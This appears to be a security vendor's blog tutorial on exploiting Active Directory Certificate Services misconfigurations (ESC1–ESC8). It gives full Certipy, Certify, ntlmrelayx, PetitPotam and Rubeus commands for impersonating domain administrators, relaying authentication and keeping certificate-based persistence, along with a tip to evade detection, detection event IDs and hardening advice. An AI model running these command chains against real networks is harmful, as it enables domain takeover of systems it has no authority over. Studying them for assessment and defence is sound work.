DATE
March 27, 2026
Active Directory Certificate Services (AD CS) is one of the most overlooked attack surfaces in Windows enterprise environments. While organizations pour resources into hardening their domain controllers and patching endpoint vulnerabilities, their Public Key Infrastructure (PKI) quietly becomes a goldmine for attackers. Since SpecterOps published their groundbreaking research "Certified Pre-Owned" in 2021, AD CS misconfigurations have become a staple in red team operations and real-world threat actor playbooks alike.
This blog walks through how AD CS exploitation works, the most critical attack paths, practical commands used during engagements, and what organizations must do to reduce their exposure. If your environment runs AD CS and has never been audited for these vulnerabilities, you are likely sitting on a critical risk you do not even know exists.
If you want a professional team to assess your AD CS infrastructure, Redfox Cybersecurity offers specialized penetration testing services that cover PKI misconfigurations, certificate abuse, and full Active Directory attack chains.
AD CS is Microsoft's implementation of a PKI role that allows organizations to issue and manage digital certificates. These certificates are used for a wide range of functions including smart card authentication, SSL/TLS, code signing, and encrypted email. In Active Directory environments, certificates can be used to authenticate as any user, including domain administrators, if the underlying certificate templates are misconfigured.
The reason AD CS is so dangerous from an attacker's perspective is the combination of three factors: widespread deployment across enterprises, deeply trusted infrastructure by design, and a well-documented history of insecure default configurations. Certificates obtained through abuse can be used for persistent access that survives password resets, making them particularly attractive for advanced persistent threat actors.
Before any exploitation begins, you need to enumerate the environment. The two primary tools used by pentesters are Certify (by SpecterOps, written in C#) and Certipy (a Python implementation by Oliver Lyak that is often preferred on Linux-based attack boxes).
Run the following from a Windows attack box or compromised host:
Certify.exe cas
This command lists all Certificate Authorities in the domain, their configurations, and whether they allow remote enrollment. Follow this with:
Certify.exe find /vulnerable
This is the most important enumeration command. It identifies all certificate templates that have exploitable misconfigurations, filtered by what the current user can enroll in. The output will flag templates with issues like low-privileged enrollment rights, dangerous EKUs (Extended Key Usages), or the ability to supply a Subject Alternative Name (SAN).
certipy find -u lowprivuser@corp.local -p 'Password123!' -dc-ip 10.10.10.1 -vulnerable -stdout
The -vulnerable flag performs automatic analysis and highlights templates susceptible to the ESC1 through ESC8 attack paths. Certipy also integrates with BloodHound, allowing you to export results and visualize certificate-based attack paths:
certipy find -u lowprivuser@corp.local -p 'Password123!' -dc-ip 10.10.10.1 -bloodhound
This outputs a zip file you can drag directly into BloodHound for graph-based analysis.
ESC1 is arguably the most commonly exploited AD CS misconfiguration. It occurs when a certificate template allows the enrollee to specify a Subject Alternative Name (SAN) in the request, the template has a dangerous Extended Key Usage such as Client Authentication or Smart Card Logon, and enrollment permissions are granted to low-privileged groups like Domain Users.
Once you have identified a vulnerable template (for example, one named "VulnTemplate"), exploit it as follows:
certipy req -u lowprivuser@corp.local -p 'Password123!' -ca 'CORP-CA' -target ca.corp.local -template VulnTemplate -upn administrator@corp.local -dc-ip 10.10.10.1
The -upn flag sets the User Principal Name in the SAN to administrator@corp.local. If the template is vulnerable, the CA will issue a certificate asserting that you are the domain administrator.
Next, use that certificate to request a Kerberos TGT:
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1
Certipy will return a TGT and the NTLM hash for the administrator account. You now have domain admin access without ever knowing or cracking the administrator's password.
Want a real-world test of whether your organization is vulnerable to ESC1 and other certificate abuse techniques? Redfox Cybersecurity's penetration testing team conducts in-depth AD CS assessments that identify and validate these exact attack paths in your environment.
ESC2 occurs when a certificate template has the "Any Purpose" EKU or no EKU at all, and low-privileged users can enroll. A certificate with Any Purpose can be used for any application, including client authentication.
certipy req -u lowprivuser@corp.local -p 'Password123!' -ca 'CORP-CA' -template AnyPurposeTemplate -dc-ip 10.10.10.1
ESC3 is a two-stage attack. First, you obtain an Enrollment Agent certificate from a template that permits this role:
certipy req -u lowprivuser@corp.local -p 'Password123!' -ca 'CORP-CA' -template EnrollmentAgentTemplate -dc-ip 10.10.10.1
Then use that Enrollment Agent certificate to enroll on behalf of another user (such as the domain administrator) in a second template that permits enrollment agent enrollment:
certipy req -u lowprivuser@corp.local -p 'Password123!' -ca 'CORP-CA' -template User -on-behalf-of 'CORP\administrator' -pfx enrollmentagent.pfx -dc-ip 10.10.10.1
You end up with a certificate for the administrator account issued entirely through legitimate PKI mechanisms.
ESC4 arises when a low-privileged user has write access (WriteDacl, WriteOwner, or WriteProperty) over a certificate template object in Active Directory. This allows the attacker to modify the template's configuration, introduce ESC1-style weaknesses, and then exploit the newly vulnerable template.
With Certipy, you can modify a template and temporarily enable the SAN flag:
certipy template -u lowprivuser@corp.local -p 'Password123!' -template TargetTemplate -save-old -dc-ip 10.10.10.1
After modification, proceed with ESC1 exploitation steps. After completing the attack, restore the original template configuration to avoid detection.
ESC6 is a CA-level misconfiguration rather than a template-level issue. When the EDITF_ATTRIBUTESUBJECTALTNAME2 flag is set on a CA, any certificate request can include a SAN regardless of what the template specifies. This means even templates that are considered safe can be weaponized.
Check for this flag using Certify:
Certify.exe cas
Look for EDITF_ATTRIBUTESUBJECTALTNAME2 in the CA flags output. If present, any template allowing Client Authentication becomes an ESC1-equivalent vulnerability.
Exploit with Certipy by supplying the UPN flag during enrollment:
certipy req -u lowprivuser@corp.local -p 'Password123!' -ca 'CORP-CA' -template SafeLookingTemplate -upn administrator@corp.local -dc-ip 10.10.10.1
ESC8 targets the web enrollment interface that many AD CS deployments expose over HTTP. If this endpoint is not protected by HTTPS or does not require Extended Protection for Authentication (EPA), it is vulnerable to NTLM relay attacks.
Use Impacket's ntlmrelayx to relay incoming NTLM authentication to the AD CS web enrollment endpoint:
ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
Then trigger authentication from a target machine. One reliable method is using PetitPotam to coerce authentication from the Domain Controller itself:
python3 PetitPotam.py -u '' -p '' attackerip 10.10.10.1
The DC authenticates to your relay, which forwards the request to the CA web enrollment interface. The CA issues a certificate for the DC's computer account. You can then use that certificate with PKINIT to request a TGT for the DC account and subsequently perform a DCSync.
ESC8 is particularly dangerous in environments running Active Directory Federation Services (ADFS) or those where the NTLM relay surface is not fully mapped. If you have not audited your NTLM relay exposure recently, Redfox Cybersecurity's red team services include full relay attack chain simulations.
One of the most insidious aspects of AD CS abuse is persistence. A certificate issued for a domain admin account remains valid until it expires, regardless of password changes or account lockouts. This gives attackers a persistent authentication mechanism that is notoriously difficult to detect and revoke without mature PKI monitoring.
Once you have a PFX file, export it with a password for safe storage:
certipy cert -pfx administrator.pfx -nokey -out administrator.crt
To use the certificate for Pass-the-Certificate attacks with Rubeus on a Windows host:
Rubeus.exe asktgt /user:administrator /certificate:administrator.pfx /password:certpassword /ptt
The /ptt flag injects the TGT directly into the current logon session, giving you immediate Kerberos access as the administrator.
Windows Event ID 4886 logs certificate requests, and Event ID 4887 logs issued certificates. Monitoring for certificates issued to high-privilege accounts (Domain Admins, Enterprise Admins) via template names that should not normally issue such certificates is a reliable detection signal.
Additionally, Kerberos authentication using PKINIT (Pass-the-Certificate) generates Event ID 4768 with a specific encryption type. Correlating this with unusual source IPs or times provides another detection layer.
Disable the EDITF_ATTRIBUTESUBJECTALTNAME2 flag on all CAs unless there is a documented operational need. Audit all certificate templates and remove the ability for low-privileged users to enroll in templates with Client Authentication EKU and SAN specification rights. Require CA Manager approval for sensitive templates. Enable HTTPS on all AD CS web enrollment endpoints and enforce EPA. Regularly run Certify or Certipy in your environment as part of your internal security reviews.
Most organizations that discover these vulnerabilities do so for the first time during a penetration test. Redfox Cybersecurity provides comprehensive AD and PKI penetration testing that gives you a clear, prioritized remediation roadmap.
Active Directory Certificate Services represents one of the highest-impact, lowest-visibility attack surfaces in enterprise Windows environments today. From ESC1 template abuse to ESC8 NTLM relay chains, the attack paths are well-documented, tooling is mature, and exploitation is achievable by intermediate-level pentesters and threat actors alike. What is not mature in most organizations is the detection, monitoring, and hardening of their PKI infrastructure.
The good news is that these vulnerabilities are entirely fixable with proper auditing, access control review, and configuration hardening. The first step is knowing whether you are exposed.
Redfox Cybersecurity specializes in Active Directory security assessments that go beyond surface-level enumeration. Their team conducts real-world attack simulations including AD CS exploitation chains, lateral movement, and persistence techniques to give organizations a ground-truth view of their security posture.
Get in touch with Redfox Cybersecurity today to schedule a penetration test and find out what an attacker would find before they do.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
%20(1).jpg)
.avif)
.jpg)
%20Attack%20(1).jpg)